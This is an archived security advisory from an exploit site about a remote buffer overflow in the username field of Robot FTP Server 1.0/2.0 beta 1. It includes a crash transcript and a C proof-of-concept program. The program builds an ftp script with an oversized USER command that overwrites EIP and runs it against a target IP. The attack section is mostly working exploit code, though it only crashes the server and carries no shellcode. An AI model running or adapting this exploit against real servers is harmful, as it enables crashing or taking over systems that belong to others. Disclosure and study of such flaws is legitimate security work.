exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

robotFTP.txt

robotFTP.txt
Posted Feb 16, 2004
Authored by gsicht

Robot FTP server versions 1.0 and 2.0 beta 1 have a buffer overflow vulnerability when taking in a username.

tags | exploit, overflow
SHA-256 | 9a44aad3f8e6c0db56451fda95fc12fc8be929e688de14d3ff9a4383aea86d72

robotFTP.txt

Change Mirror Download


Application: Robot FTP Server

https://www.robotftp.com/

Versions: 1.0/2.0 beta 1

Platforms: Windows NT

Bug: Buffer Overflow

Exploitation: remote

Date: 15 Feb 2004

Author: gsicht

e-mail: nothing.king@firemail.de



#######################################################################

1) Introduction

2) Bug

3) The Code

#######################################################################

===============

1) Introduction

===============

Quoute from the Robot ftp's website:

"RobotFTP server is an FTP server that will transform any windows computer into an FTP site and enable distribution of files to co-workers or friends.



Robotftp Server is extremely easy to setup and configure. You can create password protected or anonymous accounts, specify folders and files that are accessible for each account, and monitor activities of connected users."



#######################################################################

======

2) Bug

======

I found a buffer overflow vulnerability in Robotftp server in the username fiehlt that allowes remote command execution. I only found this vulnerability with the windows ftp client. It doesn't work with netcat or telnet.



C:\Dokumente und Einstellungen\Admin\Desktop>ftp localhost



220 Connected to RobotFTP Server

Benutzer (done:(none)): <AA...more than 47 A's...AA>

331 User name OK, send password as PASS

Kennwort:

530 User cannot log in

Anmeldung fehlgeschlagen.

ftp> Ungültiger Befehl

ftp> user <AA... about 2000 A's ...AA>

550 Access is denied

550 Access is denied

550 Access is denied

550 Access is denied

550 Access is denied

550 Access is denied

550 Access is denied

502 Command not implemented

Anmeldung fehlgeschlagen.

ftp> Ungültiger Befehl

CRASH!!!!!!

ftp> quit

C:\Dokumente und Einstellungen\Admin\Desktop>



#######################################################################

===========

3) The Code

===========

/******************************

this is example code for the vulnerability. It uses the windows ftp client to connect to a server

******************************/

#include <stdio.h>



char buffer[2500];

char cmd[50];



int main(int argc, char *argv[])

{

FILE *evil;



if(argv[1] == NULL)

{

printf("Usage: %s [IP]\n\n",argv[0]);

return 0;

}



memset(buffer,0x41,47);

memcpy(buffer+47,"\r\n",2);

memcpy(buffer+49,"crash",5);

memcpy(buffer+54,"\r\n",2);

memcpy(buffer+56,"USER ",5);

memset(buffer+61,0x41,1989);

memset(buffer+61+1989,0x58,4); // << overwrites the eip with XXXX

memcpy(buffer+65+1989,"\r\n",2);



sprintf(cmd,"ftp -s:ftp.txt %s",argv[1]);





if((evil = fopen("ftp.txt", "a+")) != NULL)

{

fputs(buffer, evil);

fclose(evil);

printf("- file written!\n");

}

else

{

fprintf(stderr, "ERROR: couldn't open ftp.txt!\n");

exit(1);

}

system(cmd);



}

/*******************************/

#######################################################################



Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close